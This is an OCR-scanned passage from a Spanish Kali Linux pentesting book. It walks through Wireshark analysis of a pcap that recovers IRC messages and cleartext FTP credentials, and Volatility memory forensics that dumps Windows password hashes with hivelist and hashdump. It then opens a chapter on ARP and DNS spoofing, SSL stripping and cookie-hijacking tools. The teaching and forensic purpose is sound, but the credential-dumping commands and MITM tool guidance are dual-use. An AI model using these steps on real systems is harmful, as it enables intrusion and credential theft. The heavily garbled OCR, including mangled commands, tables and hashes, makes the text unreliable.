-0  -  go  into  stray  ACK  mode  (barely  supported) 

-r  -  resolve  host  names  (not  recommended) 

-q  -  be  quiet  -  no  banner 

-V  -  enable  support  for  802. IQ  VLAN  frames 

p  -  switch  cord  to  promiscuous  mode 

d  -  daemon  mode  (fork  into  background) 

-l  -  use  single-line  output  [easier  to  grep) 

-x  -  include  full  packet  dump  (for  debugging) 

-K  -  display  payload  string  [useful  in  RET  mode) 


Imagen  07.25:  Para  metres  de  pOf, 
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Proof  Of  Concept?  Los  grupos  hacktivistas  y  la  red 

En  esta  prueba  de  eoneepto  se  presents  un  escenario,  que  podria  ser  perfectamente  real,  Tras  una 
investigacidn  abierta,  la  Benemerita  Jlego  a  la  conclusion  dc  que  varies  de  los  acusados,  tenian  una 
posible  relacion  con  grupos  hacktivistas  de  Anonymous,  los  cualcs  se  comunicaban  mediante  canales 
IRC  publicos,  para  la  organization  del  modus  operand!,  Se  ha  conseguido  rescatar  una  captura  de 
trafieo  de  red  en  un  fichero  pcap  del  equipo  de  uno  de  los  supuestos  miembms,  a  la  cual  se  accedio 
mediante  un  melerpreter  inyectado  en  dicha  maquina.  Para  finalizar  el  case  queda  pendiente  revisar 
la  captura  de  red,  esta  accion  debera  llevarla  a  cabo  un  analista  forense. 


Se  solicita  al  perito  que  responda  a  las  siguientes  cuestioncs  de  i  meres  para  la  resolucidn  de  la 
investigacion; 

-  ^Que  direccion  I P  y  nickname  utiliza  en  el  canal  IRC  para  comunicarse  con  los  miembros 
el  sospechoso? 

-  ^Envio  algun  mensaje  ef  usuario  por  IRC?  i A  que  sala? 

“  iQue  mas  protocolos  interesantes  aparte  del  IRC'  se  encuentran  en  la  captura? 

iQu6  version  del  protocolo  anterior  mencionado  se  ejecuta  en  la  maquina  servidora? 

-  ^Aparece  algun  login  en  la  conexion  sin  cifrar? 

-  I A  que  carpeta  y  direction  IP  se  on  v  fan  los  docu  memos? 

-  iCual  es  el  document©  mas  relevante  en  la  muestra? 

-  ;,Se  puede  visualizar  el  contenido  de  los  docu  men  los  hay  que  obtenerlo? 

-  nombre  tenia  el  fichero  sobre  el  sistema  y  que  aplicacidn  lo  ejecuta? 

En  primer  lugar  el  fichero  pcap  llega  a  manos  del  analista  forense,  el  cual  realizara  una  copia  de 
dicho  archive  y  realizara  hashing  sobre  ella  para  delemiinar  que  no  hay  cambios  sobre  las  pruebas. 
Una  vez  realizado  este  tramiie,  el  analista  forense  decide  evaluar  con  Kali  Linux  la  prueba  y  para  ello 
utiliza  la  herramienta  Wireshark  con  el  fin  de  visualizar  su  contenido. 


La  direction  IP  y  et  nickname  del  usuario  es  facil  de  conocer  ya  que  Wireshark  permite  ejecutar  un 
filtro  dc  tipo  IRC,  Como  se  puede  visualizar  en  la  imagen  filtrando  por  el  protocolo  IRC  se  obtienen 
una  scrie  dc  paquetes  de  dicho  protocolo,  entre  los  primeros  se  encuentra  su  nickname,  el  cual  fue 
introdueido  al  realizar  la  conexion. 


Fitter  i  ire 


Mi' 


Tune  Source 

9  l.m 7b?  10.  0.2.15 


10,  0,  2,  I  S 


13  3.294  877  10.0.2.15 


0«t  motion 
77.24  3.1*5, 106 

m* 

77.2*1.  l«i.  106 


|  tipHtts-ton.,.  Cleai  Apply  Sav* 

Pri'iDCol  Length  Me 

IRC  tol  Request  (CAP) 


'>  Request  (NIC* 


IRC 


7S  Request  (ifSi-A) 


ff.  Frjwe  Hi  70  bytes  on  wire  (^60  bits),  70  byte.  captured  {560  bits) 
iii  Ethernet  II ,  arc:  tadMISCo^f  b:tib:db  (06:00: 17  :fb:d6:db)  ,  o^t:  *fcalte*u_jL2 :  35:02  { 
14  interrwt  Protocol  version  4,  srt:  10.0.  2, 15  (10. 0.  2, 1S>  p  Ost;  77. 243. 1 B5,  JOB  (77. 
E  Transmission  CGWfOl  Protocol ,  Src  Port:  facil  (1030),  Ost  Port:  6667  (6667) ,  seq : 
G  internet  Relay  Chat 

E  Request:  NICK  Anon€4bitS 


Imagen  07.26:  Obtencion  dc  nickname. 
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A  continuacion  y  siguiendo  con  la  investigacidn  de  la  captura  se  puede  obtener  si  el  usuario  envi6 
algun  mensaje  al  chat  y  la  sala,  gracias  a  que  existe  un  tag  en  el  protocolo  IRC  para  los  mcnsajes 
privados,  como es  PRIVMSG.  El  filtro  utilizado  es  I RC ‘  contains  PRIVMSG*  y  los  resultados,  ml  ^ 
como  se  puede  visual izar  en  la  imagen,  son  el  descubrimiento  del  mensaje  "ya  estd  e I comunicado" 
en  la  sala  wirnock ,  - 


F-I<ief:  ift  CQntmns  PRjYMSd 


B 


Time  Source 

23  17.3T&224  77.  243.  IBS.  106 


35.64614  8  10*  0.  2 


UestinitiDn 

10.0.7.  is 


243. IS 5. 106 


*  j  Erpres^rjfi ..  CJ*ir  Apply 

P  rotf5c  qI  i  f-n  qs  h  Info 

1HC  1474  Response  (001}  (P&1>  (001)  (004)  COOS) 


109  Request 


5:  Frame  47:  109  bytes  on  tvire  (8?2  bits),  109  bytes  captured  (872  bits) 

-  ether net  II,  sre  ;  c  admusco  fb ;<J6 :  db  (08:00:2/ :fb:d6 : db) ,  Dst :  Rea"U*ku_.l2:  35:02  (52;54:00;1Z:35:02) 

V'  internet  protocol  Version  4,  Srt:  10.0,2.15  (10.0.2,15),  Dst :  77.243.185.10®  (7T.  243.  ±85.106) 

a)  Transmission  Control  Protocol^  Src  Port:  i  adl  (1030),  Dst  port:  6667  (666?),,  5eq;  133,  ACk:  5364,  Lsn:  55 

-  internet  Relay  chat 

E  Request:  ^insock  :Va  est\3Q3\241  e)  cowunitado  praparado  };) 

Command:  privhsg 
m  command  parameters 

Trailer:  Va  est\J03\241  el  comunicado  preparado  }; ) 


Imagen  07.27:  Recuperation  del  mensaje  privado, 


El  analista  forense  debe  buscar  todos  los  deialles  en  esta  captura  por  lo  que  investigando  se  puede 
encontrar*  tal  y  como  se  ve  en  la  imagen,  que  existen  otros  protooolos  interesantes,  en  estc  caso  FI  P. 
Ademas,  se  puede  visualizar  la  direction  IP  de  la  maquina  servidora  asi  como  la  versi6n  del  servicio, 
Este  hccho  podrfa  ser  ima  via  para  com  probar  la  seguridad  del  producto  y  la  maquina  que  tiene  dkho 
servicio  ms  tal  ado. 


Imagen  07.28:  DescubrimieiiLo  de  servicios  y  versiones, 

Durante  la  investigation  al  protocolo  FTP  se  puede  detectar  algiin  login  que  no  se  encuentre  eifrado. 
ya  que  FTP  es  un  protocolo  inseguro.  En  la  imagen  se  piteden  visual izar  las  credenciales  de  acceso 
al  servtdor  FTP  anterionnente  mencionado. 


53  42.724246  10,0.2.15  192.166.0.52  ftp  66  REquest :  USER  retain 

54  42,725282  192,166.0.  52  10,0.215  TCP  50  ftp  >  t*d2  (ACK]  Seq-149  4c k=1 1  Hfi n=6553 5  Len-C 

55  42.725822  i92.168,0,?2  10.0,2.15  ftp  67  Response:  331  password  required  for  admlrt  _ 


Mm  56:  71  dn  wire  (568  bits)  ,  71  bylr-s  c.4Ptur*d  (568  bits) 

hwrrtei  ti  (  sre:  C  ad«U  5C  0_  f  b ;  d6 :  cib  (06 : 00:  27 :  f  b;  d6 :  db)  ,  Dst:  ftealtrku.  17:  35  (52:  54:00:17:  35:02} 

tttrnet  prat  wo!  version  4,  srt:  10.0,2,15  (10. 0.?.  IS) ,  Dst:  102,168,0,52  (102,1*18.0.52) 

4nsflHTis1on  control  protocol  sn  Port:  1ad2  (1031),  Dst  Parts  fxp  (71),  £®q:  IS,  ACk:  162,  L*n:  17 
He  trinsfer  Protocol  (ftp) 

fa£5  hackl2  3day\r\ri 
Request  command:  PASS 
Request  arg:  hatki?3day 


Imagen  07.29:  Obtencion  de  credenciales  del  servidor FS  P. 
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Si  se  sigue  anafizando  la  captura.  el  analista  forense  podra  descubrir  que  el  usuario  se  loguea  en 
un  servidor  FTP  eon  el  fin  de  obtener  o  subir  un  archive.  Si  se  sigue  invest igando  se  obtiene  que  cl 
usuario  sube  un  archive  ul  servidor,  en  concrete  a  la  earpeta  key  logs,  lil  documento  que  se  sube  licne 
por  nombre  Keys  Apr  30  20 J 2  !6J 0_02. him!. 


Imagen  07.30:  Cambio  de  direcrorio  y  subida  de  archive. 


Una  vez  localizado  el  documento  en  la  captura  sc  debe  extraer  como  prueba,  por  lo  que  se  utilizara 
la  opcion  /■  allow  TCP  Stream  con  Wire  shark  ->  Save  As  ->  FicheroJumh  en  dbnde  se  encuentra 
el  primer  paquete  FTP  Data  que  se  envia  desde  el  usuario  hack  el  servidor  Una  vez  extra  (do  el 
fichero  se  puede  visual  izar  su  contenido,  y  sc  ohserva  el  comunicado,  ademas  del  lie  hero  original  y 
la  aplicaeion  utilizada  para  abrirlo. 

-.1  *t  '  -  q^  p>il  qr  »1j  |1*  Tfll  nrt»pn:1  'HT  *nr,_r/«i»jnr  Mf  lllrv  4a  r.rfi* 

•CimJ  jdaciD-  dal  iftiiado 

£l  -11*  sic  2T  da  fabrarti  rinl  3^11,  iiiljidu  ijrji  iiSls-doa,  la  Intarp^l  y  d.ir^rs^s  a*oc._LA_:ilUnn  pclicialon  on  Ufai  1*,  Co 

un  ci-JdadiliO  «a|Jifl'jl  de  Mil  ago.  b»ja  las  ’.mcialiif  F.J.B.D.  iFJfflfKiisCu  ,  rcna«idc  fciijn  ins  r.ict*  dt  >  fc,i_  jHuh'  y  "truano1  y  qiis  ;s 

Un  ciudadsne  aspailcl  tic  Ms  (trig  Tje>  soT-walia  L-a  i  _■  el  leudsniaa  "Jray*  sen  las  in  i  mi  a  1m  I.H.I.S,  y  pasaU  larTidsni  dUUBt. 

Un  cuirtiriano  airp^fiol  de  Haiitid  con  1ms  uu:ij'iG>  I.f.p.3, 

Ufi  JaieuabtC  ausnur  d*  eiad  no  identif cacSr.  eup-j-EitK  iteHflL  b  Lerjecia  a  n'uastrs  tasjn  asa^iadsj  Saccoi.  (D4. 

C±nco  cSndadanoi  cbilnnoe  Ltrea  da  allSn  eatudiiEitni  dc  i nfarma z i ma ,  un  p  ro  - 1  OTli  i\ a  ai.  d.s'.sijr,  um  mnnn-  -Us  ^rtart)  y  un  tludadtnD  c-jIlc, 
TJH  fl*--  pl€rc- LSe-ic.  de  cxiidadatirs  irgantiunt  emeat<9  IB!  y  irrllertnbiiiiioij  muchoa  dc  alio#  IW55-j'.:-.r.*;  Je  adad . 

Imogen  07.31:  Extraction  del  comuni cada 


5.  Forense  de  RAM 

- 

Denim  del  apartado  forense  de  RAM,  Kali  Linux  ofreee  dos  herramientas  eonocidas  como  son 
Volafax,  para  trabajar  con  volcados  de  memoria  de  maquinas  MacOS  X  y  Volatility  Framework,  el 
eual  permite  la  extraccidn  de  informacidn  sobre  volcados  de  maquina  dc  sistemas  Windows.  Am  has 
aplicaciones  estan  desarrolladas  en  Python,  eon  lo  que  facilitan  la  integracidn  sobre  cualquier 
sisiema  operative.  Para  incluir  un  caso  practice  en  el  libro,  sc  ha  decidido  reali/ar  las  pruebas  sobre 
el  voleado  de  una  maquina  MS  Windows XP SP 2,  con  lo  que  la  faerramienta  estrella  sera  Volatility* 
Bnire  las  opciones  dc  extraccidn  que  brinda  este  framework*  se  pueden  destacar  las  siguientes; 

■h 

-  Tipo  de  sistema,  fecha  y  hora, 

Procesos  que  se  estaban  ejecutando. 
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Puertos  abiertos. 

-  Puerlos  eonectados. 

-  DLLs  cargadas  por  proceso* 

-  Ficheros  cargados  por  procesos, 

-  C laves  del  registro  utilizadas  en  los  procesos, 
Mddutos  del  kernel* 

Mapa  fisieo  de  offsets  a  direcciones  virtuales. 
Direceionamiento  de  memoria  por  proceso, 
Extraccion  de  ejecutahles. 


Para  explotar  satisfactor i am ente  todas  estas  opciones,  es  necesaria  la  utilization  del  gran  numero  de 
plugins  que  vienen  poi  defeeto  en  Volatility.  Uno  de  los  desarroll adores  de  plugins  mas  conocidos 
es  Brendan  Dolan,  el  cuat  los  hace  pubHcos  de  forma  gratuita  en  su  pagina:  http:/fwwwxc.gatech. 
eduf—hrendanfvol alii  i  l  yf 


A  conti nuacion  se  muestra,  uno  de  sus  plugins  extrayendo  informacidn  acerca  de  las  cuenlas  de 
usuario  de  los  propios  procesos. 


!  \f*  voi  ~t  /root /Desk top/dia log .mam  getsids 

Volatile  Systems  Volatility  Framework  2*1 
System  (4):  S-l-5-18  (Local  System} 

System  (4) ;  S-l-S-32  544  ( Administ rotors) 

1-0  (Everyone) 

5-11  (Authenticated  Users) 

S-l-5-18  (Local  System) 

S  -1-5-32 -544  ( Administ rators) 

S -1-1-0  (Everyone) 

S -1-5 -11  (Authenticated  Users) 
S-l-5-18  (Local  System) 

S-l-S-32 -544  (Administrators) 


System  (4) :  S -1 - 
System  (4) ;  S-l- 
sitiss  .  axe  { 42S)  : 
smss.exe  (420): 
snss.exe  (420): 
smss.exe  (420); 
esrss.exe  (676) : 
csrss.exe  (676)  : 


csrss,exe  (676):  S-l-1-9  (Everyone) 
csrss*exe  (676):  S-1-5-1I  (Authenticated  Users: 
winlogon.axe  (700);  S-l-5-18  [Local  System) 
winlogorr.exe  (700);  S-I-5-32-544  (Administrators; 

£-1-1-0  (Everyone) 

S-1-5-I1  [Authenticated  Users) 
S-l-5-18  (Local  System) 

S-l -5-32-544  (Administrators) 
S-l-1-0  (Everyor 
S-l-5-11  (Author 
lsass.exe  (756);  S-1-5-1B  (Local  Sys 
jlsass.cme  (756);  £-1-5-32-544  (Administrators) 
lsass.exe  (756);  S-l-l-G  (Everyone) 
lsass.exe  (756)  :  S-l-5-11  [Authenticated  Users) 


winlogon . exe  ( 700} : 
winlogon-exe  (700} ; 
services -exe  (744}  : 
services ,exe  (744)  : 
services,exe  (744) : 
servicesnoxe  (744)  : 


ujm±M±&L  r  a  lu  i 

Sr  tW 


lmag^n  07.32:  GetSids. 


( )tra  de  las  opciones  utiles  a  destacar.  es  sin  duda  la  de  reali/ar  un  arbol  de  aplicaciones  en  ejecueidfl 
eon  pstree,  para  identificar  inclusive  sus  pid  e  mteractuar  mediante  otros  plugins  eon  los  procesos 


encontrados. 
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idk.i  :/#  vol  -f  /  root  /Desk  top /dial  og  ♦  mem 
Volatile  Systems  Volatility  Framework 

Warns  Pid 

pst ree 

PPid 

Thds 

Hnds 

Time 

0x80ef9020: System 

4 

0 

54 

238 

1970-01 *01 

00:00:00 

,  0x80d81t>48 :  smss ,  exe 

420 

4 

3 

19 

2012-05-03 

11:15:101 

*,  0xfft>525f0:csrss  .exe 

676 

420 

10 

345 

2012-05-03 

11:15:11 

, ,  0x80dd5020 :wlnlogon ,exe 

700 

420 

19 

455 

2012-05-03 

11:15:11 

, ♦ .  0x80d70da0 : msdcsc .exe 

456 

70G 

6 

90 

2012-05-03 

11:24:43 

....  0xffbdb650 'notepad , exe 

344 

456 

2 

32 

2012-05-03 

11 :24:44 

...  0x3Qdf6988  services  ,  axe 

744 

700 

15 

243 

2012 -05-03 

11:15:12 

... .  Gxffbaf230 :alg .exe 

520 

744 

3 

82 

2G12-05-Q3 

11:15:25 

....  0xffb7da78 ;svchost  Texe 

1048 

744 

9 

206 

2012-05-03 

11:15:13 

....  0xf f aBd5f8 rsvchost .exe 

1172 

744 

6 

77 

2012-05-03 

11:15:13 

....  Gxf fa9e3c0 : VBoxService .exe 

924 

744 

8 

106 

2012-05-03 

11:15:12 

....  0xf fb9d560 :spoolsv .exe 

1456 

744 

11 

107 

2012-95-03 

11:15:14 

....  Gxf fb8356G :svchost ,exe 

1212 

744 

13 

190 

2012-05-03 

11:15:13 

....  0xf fs9c8b0:5vchost .exe 

968 

744 

18 

166 

2012-05-03 

11:15:12 

....  Gxf fa946aS:svchost .exe 

1124 

744 

63 

1098 

2012-05-03 

11:15:13 

, 0x80d4 7460 :wuauclt . exe 

1089 

1124 

4 

0 

2012-05-03 

11 :2S:08 

.  0x80d4fda0rwscritfy  .exe 

T  fjfl  t  n 

28 

2012-05-03 

11:24:43 

...  Gx80daf26G :lsass .exe 

PS6 

337 

2012-95-03 

11:15:12 

Imogen  07.33: pslree. 


La  posibilidad  de  ver  las  conexiones  realizadas  en  el  momento  de  ia  eaptura  de  RAM,  es  sentilla 
graeias  a! plugin  sockets .  Bste  permitira  en  un  forense  de  malware*  identificar  laciimeme  los  puertos 
abiertos  y  conexiones  realizadas  en  el  momento  de  la  eaptura. 


■  un-  ;  /#  vol  -f  /  root  /Desk t op/dial og  .mem  socket* 

Volatile  Systems  Volatility  Framework  2-1 

Dffset(V)  PID  Port  Proto  Protocol  Address 


Create  Time 


0xffa3de9B  1124  123 

0xffb6700B  756  500 

3xffb4f4bG  4  445 

9xffb76e90  1040  135 

0xffa3a2d0  1124  123 

0xffa7d750  756  0 

0xffba3a90  1212  1900 

0xffa3fe38  1172  1025 

0xffb4e978  4  139 

0xffbdb4b0  4  137 

X90d31bf0  1212  1900 

Xffb81000  756  4500 

xffb4ecG8  4  445 

Xffb4e6e8  4  138 


17  UDP 
17  UDP 
6  TCP 
6  TCP 
17  UDP 

255  Reserved 
17  UDP 
17  UDP 
6  TCP 
17  UDP 
17  UDP 
17  UDP 
17  UDP 
17  UDP 


192, 16B.0. 106 
0,0. 0.0 
0.0. 0.0 
0,0, 0.0 
127.0.0,1 
0  . 0  .  G  .  G 
192.168.0. 1B6 
0.0. 0,0 


2012 

2012 

2012 

2012 

2012 

2012 

2012 


05*03 
05-03 
05  *  03 
05*03 
05*03 
05-03 
05-03 
03 


0.0. 0.0 
0.0. 0.0 


192.168.0.106 


05-03 

05-03 


11:15:25 

11:15:22 

11:15:10 

11:15:13 

11:15:25 

11:15:22 

11:24:46 

11:15:25 

11:15:11 

11:15:11 

11:24:46 

11:15:22 

11:15:10 

11:15:11 


Imagen  07.34:  Sockets, 


Otra  de  las  posibilidades,  es  la  de  extraccion  dc  los  hashes  de  usuarios  del  sistenra,  que  contiene  la 
imagen  de  la  memoria.  Lsta  es  posible  uiilizando  dos plugins.  Uno  de  ellos  es  hivelisL  que  mediante 
egrep  en  Linux*  filtra  resultados  para  que  la  eonsola  tan  solo  muestre  las  direcciones  de  memoria 
donde  se  alojan  los  ficheros  de  SAM  y  System. 

Vol  -f  /root/ Desktop/di  a  log.  mem  hive/ is  t  \  egrep  *(SAM$\system$) 
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ji(jakr»l  l  :/#  vol  -f  /roQt/DesktQp/4L^\j.HQlpj  F  AH'^sysigmir 

Volatile  Systems  Volatility  F ramewo  rk  271 

3xel3a31a8  0x08cGbIa8  \DoviCG\HardcttskVolumel\WIND0WS\system32\config\SAM 
3xel0181fO  9x048471  f@  XDevice\HarddiskVolumel\WINDQWS\svstem32\conf ioXsystem 

Imagcn  0735;  SAM  y  System, 

Utilizando  las  direcciones  de  memoria  que  hivelist  ha  extraido  de  la  imagen,  es  posihle  reaiizar  h 

combinacion  junto  con  el  plugin  has  dump,  para  el  volcado  de  los  hashes. 

%  _ 

Vol  -f  froo t/Desk  lop/dialog, mem  hashdump  -y  Oxel  OlSlfO  -s  Oxel 3 a3 1 a8 


i :/#  vol  -f  /root /Desktop /dialog  .mem  hash  dump  -y  GxelGIBlfG  -s  0xel3a31aS" 
Volatile  Systems  Volatility  Frames 


Idminist rador:539 :0735172c3a77d2c6 
[nvitado  :501 :  aad3b435bSl494eeaad3bTOPW^4Hg  jjj-tfpc 
Vsistsnte  de  ayuda; 10QQ : 31 7dd9337ea2d54^acS7^3cd7ee7T7yT' 
3UPPORT_300945a0:1002:aad3b435b51404eeaad3b435b51404fte:3cb0da961c430B97eebcc9440a7259&4: 
saps : 1 833 : 8 7351 72c  3g77  d 2c 6a  a d  3b4  35b51 4Q4ee : 5 1 2h99flG 9997 c 3b55 B8c a  fac 9  c Baa  969 : ; :  _ 


afac9c0ae969: : ; 
Gc009c0 : : : 
f3a095 70442 879965d : 


Imagen  0736:  Extraecum  de  hashes  coir  Hashdump. 


Ademas,  Volatility  pennite  al  In  re  n  so  reaiizar  \  olcados  de  ejecutables  y  librerias  que  se  encuentrcn 
on  ejecucion.  con  In  que  herramientas  como  pmcdump  o  ill!  dump,  hacen  esta  tarea  aun  mas  sene  ilia 
A  cnniinuucion  se’  niuestra  una  imagcn  en  la  que  mediante  el  plugin  dlllisr .  se  consiguc  un  listado 
de*  librerias  dinamicas  quo  cargadas  en  los  procesos  ejecutables,  pueden  ser  volcadas  con  dlldump. 


t  royarsQ  .exe  pid:  256 

Command  line  :  CtWW>0WS\Bvsteffl32Vtrevino+«Jte 
Service  Pack  3 

tasG  Size  Path 

3x80400000 
3*7C9l0000 
9x7cBS300G 
9x70390000 
6x77b  f  0000 
0k71330000 
05£77ria000G 
0x77e50900 
9x77  fc0000 
9x77beQ0G0 
0x71 a20000 
Bx74a&0000 

/bin#  val  -f  /root /Desktop/dialog  .men  dll  dump  -D  /root /Desktop/  •  bdse=Gx7£a6&00G  --Did~15£ 
Volatile  Systems  Volatility  Framework  2.1 

Pracess(V)  Name  Nodule  Base  Hatful  e  Name  Result 

9 X B3b  1  dd30  t  royang^exB _ Bn&74a6eOflO  PQWRPROF  .dll _ QK  ;  IftQdul c  1 1 5 6  - ■  J r  L dda-3  .  / 4 360006  . dll - 

Imagcn  0737:  Volcado  de  librcria  a  disco, 


9x1 3000  C  AWINDOWSXsysteiit32Xtroyano,ftxo 
0x  b500B  C  AW  I MDQWSX  s  ys  t  a  m32\n  t  dl  l .  dll 
Ax  1 03000  C  AW1  foDOWSVsyst  em32\ke  rnel32  .  dll 
3x  51000  C:\W1  MDQWS  \  s  y s  t  e  n 32XUSER3  2  .  dU 
0x  4  9000  C  AW  I  NDOWSXs  y  st  ein32XGD  132  .dll 
Gx 1 70G0  C : XWT N DQWSXs y s  t em32\WS2_32 . dll 
Gx sc 000  CAW IXDOWSX s y s t ein32\ ADV API32.dll 
0x92000  C  AW  1 MDOWS  Vs  y  s  t  em3fX  ‘ 

0x  1 1 300  C  AW  I NDGWS  X  s  y  s  t  em3l\&4c  p  r-3  2  J  dl  1| 
3x58600  C :  \WI NDOwS Isyst eir32l 
0x 8000  C  AW r MDOWS X s y s t em32\ WS2MELP,dll 
0xB0G0  C :  XW I ND0W3  X  s  y  s  t  eib32XP0WRP RDF  .‘dU 
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Kali  Linux  dispone  de  herramientas  para  husmear  y  envenenar  redes.  Estas  hemmientas  ayudan  al 
pentester  a  monitorizar  y  eontrolar  el  trafico  de  otros  elementos  de  la  red  como  pueden  ser  equipos3 
servidores  o  telefonos  con  VOIR 

En  una  auditoria  interna  estas  herramientas  pueden  ayudar  y  macho  a  conseguir  informacion 
privilegiada  que  viaja  por  la  red,  o  incluso  a  conseguir  credenciales  que  ayuden  al  auditor  a  elevar 
privilegios  en  el  dominio  de  la  red* 

En  este  capitulo  se  estudiaran  las  diferentes  herramientas  que  Kali  Linux  proporciona  a  I  pentester 
para  este  tipo  de  situaciones  y  se  detallaiin  cienas  pruebas  de  concepto  las  cuales  son  realmente 
interesanles. 


1.  Herramientas  en  Kali 


Existen  di versos  apartados  donde  encontrar  herramientas  relaeionadas  con  los  ataques  en  redes  en 
Kali  Linux.  Los  apartados  son  los  siguientes: 

Envenenaniiento  de  redes. 


-  Herramientas  VOIP. 

-  Husmeando  la  web. 

-  Husmeando  redes. 

-  Voz  y  vigilancia. 


En  el  envenenaniiento  de  redes  el  objotivo  del  pentester  es  conseguir  que  el  traJico  de  la  o  las 
victimas  pase  por  eh  El  principal  problema  es  cl  dfecccionamiento  que  la  vlctima  este  utilizando,  es 
decir,  si  la  vietima  uliliza  el  protocolo  IPv4  o  IPv6.  Kali  Linux  presents  una  sene  de  herramientas 
para  cada  uno  de  los  proiocolos  con  las  que  el  pentester  conseguira  dicho  objetivo. 


Mas  adelante  se  hablara  en  detalle  de  los  ^scenarios  y  mediants  la  ejecuctdn  de  una  piueba  de 
concepto  se  i  natrium  el  como  llevar  a  cabo  die  ha  acci6n,  , 
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A  continuacion  se  muestra  un  listado  de  herramientas  eomunes  para  el  envenenamiento  de  redes 
independicntemente  de  si  son  para  el  protocolo  IPv4  o  IPv6: 

-  Arpspoaf  Esta  herramienta  permite  realizar  la  tecniea  ARP  Spoofing  en  una  red  IPv4.  |  [ 
objetivo  de  la  aplicaeibn  es  envenenar  fas  lahlas  ARP  de  un  objetivo  respect©  a  ulra  maquiruu 
con  el lo  el  atacante  sc  hard  pasar  ante  el  objetivo  por  otra  maquina.  Un  ejcmplo  clasico  seria 
envenenar  a  una  maquina  para  indicar  quo  el  router  ha  cambiado  su  direccidn  MAC  y  que 
ahora  la  direceion  MAC  del  router  es  la  del  equipo  del  pentester. 

-  SSLStrip.  Esta  herramienta  permite  realizar  la  teenica  SSL  Strip ,  con  la  que  un  atacante 
puede  realizar  un  MITM  especial,  apoyandose  en  ARP  Spoofing.  Esie  MITM  especial 
consists  en  que  la  conexion  entre  la  vlctima  y  el  atacante  va  por  protocol©  no  seguro  HTTP,  y 
la  conexion  con  el  servidor  de  verdad  va  con  HTTPS,  La  victims  notara  en  su  navegador  que 
los  sitios  donde  antes  aparecia  HTTPS  ahora  ya  no  aparecera. 

-  Ettercap,  Esta  herramienta  permite  realizar  un  ataque  de  ARP  Spoofing.  Lo  interesante  es 
que  proporciona  una  GUI  y  un  sistema  de  filtros  desarrol tables  por  el  pentester  en  funcion 
de  lo  que  necesite. 

Yersinia.  Esta  herramienta  trabaja  en  capa  2  y  permite  testear  la  posibi I idad  de  saltar  de 
VLAN,  Con  esta  herramienta  se  podra  realizar  ataques  a  switches  y  testear  la  viabilidad  para 
lograr  evitar  las  medidas  de  proteccidn  en  las  redes  de  estos.  Yersinia  es  compatible  con  los 
switches  Cl  St  t)  con  los  que  por  ejcmplo  se  puede  sallar  de  VLAN  graeias  al  prolocolo  DTP 
si  este  se  eneuentra  habilitado  por  defeeto. 

-  Parasitefh  Esta  herramienta  permite  realizar  un  ataque  MITM  en  redes  con  protocol© 
IPv6  mediante  el  uso  del  protocol©  ICMPv6  para  eambiar  las  “tablas  de  vecinosT 

-  Fake_ router 6.  Esta  herramienta  permite  realizar  un  ataque  de  tipo  SLAAC  en  redes 
IPv6  mediante  los  RA.  {Router  Advertisement).  Con  esle  tipo  de  aplicaeidn  un  equipo  puede 
anunciarse  en  la  red  com©  si  fuera  un  router,  por  lo  que  otorgara  direceion  IP,  DNS  y  puerta 
de  enlace  a  otros  equipos  de  la  red.  Con  esta  posibilidad  es  reahnente  sencillo  realizar  un 
ataque  MITM  a  otros  equipos  de  la  red. 

-  Evil  grade,  Este  framework  permite  comptometer  equipos  a  traves  de  actualizaciones 
fa  Is  as.  El  framework  necesita  que  antes  el  atacante  haya  realizado  ARP  Spoofing.  DNS 
Spoofing ,  configuracion  de  un  punto  de  acceso  Wireless  falso,  secuestro  de  DHCP  o  cualquier 
otra  manera  que  permita  al  atacante  imerceptar  el  trafico  de  la  vietima.  Es  posible  conseguir 
el  control  total  de  una  maquina  que  se  eneuentre  completaraeute  aetualizada  en  un  test  de 
intrusion. 

-  Macchanger,  Permite  eambiar  la  direceion  MAC  del  adaptador  fisico  de  red, 

*  DNSChef  Esta  herramienta  es  eapaz  de  ejeeutar  un  DNS  Proxy  o  fake  DNS  y  mampular  las 
tramas  de  peticiones  o  respuestas  del  protocol©  DNS,  Se  puede  imerceptar  una  peticion  DNS 
a  un  dominie  y  redirecctonar  dicho  dominio  a  una  direceion  IP  focal  donde  poder  analizarla, 
o  incluso  Inyectar  una  backdoor  aprovechando  alguna  vulnerabdidad  del  navegador.  La 
herramienta  dispone  de  soporte  para  IPv6,  con  lo  que  ayuda  a  comprobar  la  seguridad  en 
este  soporte. 
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Para  sniffar  o  ha  smear  la  informacion  que  se  puede  consultar  a  traves  dc  la  web  exisien  di  versus 
herramientas  englobadas  en  este  apartado.  A  continuacion  se  detallan  las  mas  lelevantes  e  into  res  antes 
para  el  peniesten 


-  Drifinei  Esta  herramienta  permite  mostrar  "on  thefty  "  las  imageries  que  una  vfetima  esta 
visualizando  en  su  navegacion,  Por  dchajo  d  atacante  esta  realizando  algima  lecnica  para  que 
las  imagenes  pa  sen  por  cl,  como  por  ejemplo,  ARP  Spoofing „ 


DNSSpoof  Esta  herramienta  permite  realizar  la  lecnica  de  DNS  Spoofing  sob  re  una 
victim  a,  siempre  y  cuando  por  debajo  se  este  redireecionando  el  tratieo  de  esta  por  el 
atacante.  Con  esta  aplicacion  cuando  la  victim  a  real  ice  peticiones  DNS,  el  atacante  podra 
nianipular  dicha  informacion  y  devolver  re  so  3  Lie  i  ones  lalsas  eon  el  objetivo  de  falsear  la 
direccidn  IP  devuelta.  Es  un  punto  de  inflexion  para  realizar  phishing  de  manera  sencilla 
gracias  al  servidor  DNS  false. 

Ferret,  Es  un  sniffer  que  captura  cookies  almacenandolas  en  un  archive  de  texto  o  PCAP. 
Se  complements  con  otra  aplicacidn  denominada  Hamster,  la  cual  se  encarga  de  abrir  en 
Fi refox  esc  archive  y  dar  la  posibilidad  al  atacante  de  acceder  a  Los  sitios  con  las  cookies 
obtemdas,  Hay  que  recordar  que  se  necesita  de  un  ataque  ARP  Spoofing  que  permita  al 
atacante  procesar  el  trafieo  de  la  vfetima  y  obtener,  en  este  caso,  las  cookies  de  sesion. 

-  MITMProxy.  Es  un  Proxy  que  permite  interceptar  y  modifkar  trafieo  HI  f  P  mediante  un 
ataque  de  MiTM  Ademas,  permits  almacenar  el  trafieo  HTTP  e  interceptar  los  certificados 
SSL  generados. 


URLSnarf.  Esta  herramienta  filtra  las  peticiones  de  trafieo  HTTP  v  lo  muestra  por 
pantalla.  Permite  realizar  un  seguimiento  de  la  navegacidn  de  ta  victima  y  las  peticiones  que 
esta  realiza,  Puede  ser  util  si  se  necesita  realizar  alguna  accion  sobre  el  trafieo  de  la  vfetima  y 
visual  izar  rapidamente  los  resultados  con  esta  herramienta,  por  ejemplo,  eambiar  User- A  gent 
